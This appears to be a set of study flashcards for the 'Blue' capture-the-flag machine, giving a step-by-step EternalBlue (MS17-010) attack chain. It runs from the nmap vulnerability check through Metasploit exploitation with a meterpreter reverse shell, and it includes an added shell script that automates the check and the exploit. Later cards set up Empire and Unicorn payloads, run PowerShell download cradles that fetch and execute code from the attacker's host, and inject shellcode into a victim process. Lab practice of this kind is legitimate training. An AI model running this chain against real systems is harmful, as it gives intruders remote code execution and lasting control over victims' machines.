blue Flashcards

1
Q

What nmap command to tell if vulnerable to eternalblue?

A

nmap -p 445 --script safe -Pn -n 10.10.10.40

*** --script takes two dashes. The safe category includes smb-vuln-ms17-010, and that script's output is what reports the host as VULNERABLE to MS17-010; running --script smb-vuln-ms17-010 alone gives the same answer with less noise.

2
Q

How to launch Metasploit?

A

msfconsole

3
Q

What do you do after you launch metasploit?

A
  • search for the EternalBlue Metasploit module

- search ms17-010

4
Q

What do you do after you locate the eternalblue metasploit module?

A
  • load the module

- msf5> use exploit/windows/smb/ms17_010_eternalblue

5
Q

What do you do after loading the metasploit module?

A
  • set the payload with meterpreter reverse tcp shell

- > set payload windows/x64/meterpreter/reverse_tcp

6
Q

What two values do you set for the reverse tcp payload before exploiting?

A
  • set the lhost and rhost values
  • > set lhost tun0
  • > set rhost 10.10.10.40

*** lhost accepts an interface name (tun0) or an IP; it must be an address the victim can reach back to, so use the VPN interface rather than eth0.
7
Q

What is the final step for the eternalblue module after configuring the settings?

A
  • run the exploit

- > exploit -j

*** -j runs the exploit as a background job: the console returns immediately and the new session is listed with sessions instead of being entered directly.

8
Q

How do you tell if you have active sessions after running the reverse_tcp payload exploit?

A

> sessions -l

*** sessions -l (or plain sessions) lists the active sessions; sessions -i <id> interacts with one of them and is not a listing command.
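The cards above run the check and the exploit as separate manual steps. The script below is an added example, not part of the flashcards or of Metasploit/nmap, that gates the EternalBlue module on the nmap smb-vuln-ms17-010 result and keeps the two offline pieces (parsing the nmap output, building the msfconsole command) in their own functions. The target 10.10.10.40 and the tun0 interface come from the cards; the function names and the sample nmap output are constructed for this example.

```shell
#!/bin/sh
# Added example, not from the flashcards: only fire ms17_010_eternalblue when
# nmap's smb-vuln-ms17-010 script actually reports the host VULNERABLE.
# Assumptions: target 10.10.10.40 and interface tun0 are taken from the cards;
# function names and the sample nmap output below are constructed for this example.

# Exit 0 when nmap output on stdin contains an smb-vuln-ms17-010 block that
# reports "State: VULNERABLE"; exit 1 otherwise (no block, or only an error line).
ms17_010_vulnerable() {
    awk '
        /smb-vuln-ms17-010:/           { inblock = 1; next }   # header line of the script block
        inblock && !/^[|]/             { inblock = 0 }         # first line without the "|" prefix ends it
        inblock && /State: VULNERABLE/ { found = 1 }
        END { exit found ? 0 : 1 }
    '
}

# Print the msfconsole -x string for the module, payload and options the cards use.
build_msf_commands() {
    rhost=$1
    lhost=$2
    printf '%s; ' \
        'use exploit/windows/smb/ms17_010_eternalblue' \
        'set payload windows/x64/meterpreter/reverse_tcp' \
        "set RHOSTS $rhost" \
        "set LHOST $lhost" \
        'exploit -j'
    printf 'sessions -l\n'
}

# Check first, exploit only on a positive result. This is the only part that
# touches the network; it is not called unless the script gets arguments.
blue_exploit() {
    target=${1:?target IP required}
    lhost=${2:-tun0}
    if nmap -p 445 -Pn -n --script smb-vuln-ms17-010 "$target" | ms17_010_vulnerable; then
        msfconsole -q -x "$(build_msf_commands "$target" "$lhost")"
    else
        echo "[-] $target did not report MS17-010 VULNERABLE; not running the exploit" >&2
        return 1
    fi
}

# Constructed sample of the nmap host-script block for a vulnerable host.
NMAP_VULN_SAMPLE='Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|_    https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

Nmap done: 1 IP address (1 host up) scanned in 2.41 seconds'

# Constructed sample for a patched host: the script leaves only an error line.
NMAP_PATCHED_SAMPLE='Host script results:
|_smb-vuln-ms17-010: ERROR: Script execution failed (use -d to debug)

Nmap done: 1 IP address (1 host up) scanned in 1.10 seconds'

# usage: sh blue.sh 10.10.10.40 tun0
if [ "$#" -gt 0 ]; then
    blue_exploit "$@"
fi
```

The parser keys on the "State: VULNERABLE" line inside the script's own block rather than on the word "VULNERABLE" anywhere, because the script prints "VULNERABLE:" as a section header even when the detailed state is what matters, and a patched host usually produces no block at all or a single error line.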

9
Q

What do you do after you have a victim machine connected with a reverse TCP payload for the EternalBlue exploit?

A
  • Check to make sure Empire is installed.

- Use Empire after it has been installed.

10
Q

How do you install Empire if it is not installed?

A
- install, run setup, and then launch Empire
> cd /opt
> git clone https://github.com/EmpireProject/Empire -b dev
> cd Empire
> cd Setup
> ./install.sh
> cd /opt/Empire
> ./empire

*** The EmpireProject/Empire repository is archived and no longer maintained; the maintained fork is BC-SECURITY/Empire, whose layout and install script differ from the steps above.
11
Q

How do you get the PowerShell http query from Empire?

A
  • Connect to the http listener, set values, and then generate powershell payload
    (Empire) > listeners
    (Empire: listeners) > uselistener http
    (Empire: listeners/http) > set host http://10.10.14.17:443 (your IP)
    (Empire: listeners/http) > set port 443
    (Empire: listeners/http) > execute
    (Empire: listeners/http) > back
    (Empire: listeners) > launcher powershell http
    *** copy the generated text
12
Q

What do you do after you create the PowerShell payload?

A
  • Create an 'http' directory in the 'blue' directory, and create an empire.ps1 file containing the text copied from Empire
    > cd /blue
    > mkdir http
    > cd http
    > vi empire.ps1
    *** paste the copied PowerShell command into the file
13
Q

What do you do after creating the empire.ps1 file in the http directory?

A
  • Launch a Python simple HTTP server from within the http directory

> python -m SimpleHTTPServer 80

*** SimpleHTTPServer is the Python 2 module; on Python 3 the equivalent is python3 -m http.server 80. Binding port 80 requires root.

14
Q

What do you do after launching the python simple server?

A
  • connect to the victim session in Metasploit and run a PowerShell download cradle that fetches and executes empire.ps1
    > sessions -i 1
    meterpreter > shell
    c:\Windows\system32> powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.16/empire.ps1')"

*** This results in the victim machine connecting to Empire

15
Q

What do you do after the victim machine connects to Empire?

A
  • Install Magic Unicorn and generate a reverse_http payload
    > cd /opt
    > git clone https://github.com/trustedsec/unicorn
    > cd unicorn
    > python unicorn.py windows/meterpreter/reverse_http 10.10.14.16 8002

*** Unicorn writes two files: powershell_attack.txt (the payload) and unicorn.rc, a Metasploit resource file that starts the matching reverse_http handler on port 8002. That handler has to be listening before the payload runs on the victim.
16
Q

What do you do after generating the reverse http payload with unicorn?

A
  • go back to Empire and create the Meterpreter1 listener, inject meterpreter1 shellcode into the powershell process running on the victim machine
    (Empire: M9N3T5H5) > back
    (Empire: listeners) > uselistener meterpreter
    (Empire: listeners/meterpreter) > set port 8002
    (Empire: listeners/meterpreter) > set host http://10.10.14.16:8002
    (Empire: listeners/meterpreter) > execute
    (Empire: listeners/meterpreter) > back
    (Empire) > interact M9N3T5H5
    (Empire: M9N3T5H5) > ps
    (Empire: M9N3T5H5) > injectshellcode meterpreter1 2992 (whatever the PID is)
    (Empire: powershell/code_execution/invoke_shellcode) > set lport 8002
    (Empire: powershell/code_execution/invoke_shellcode) > execute
17
Q

What do you do after injecting the meterpreter1 shellcode into powershell process?

A
  • copy the powershell_attack.txt file that Unicorn produced into the blue/http directory and start a Python simple HTTP server there
    > cd blue/http
    > cp /opt/unicorn/powershell_attack.txt .
    > python -m SimpleHTTPServer 80
18
Q

What do you do after launching the python simple server?

A
  • interact with the victim machine in Empire and run a PowerShell command to download and execute the powershell_attack.txt file
    (Empire: powershell/code_execution/invoke_shellcode) > back
    (Empire: M9N3T5H5) > shell IEX(New-Object Net.WebClient).downloadString('http://10.10.14.16/powershell_attack.txt')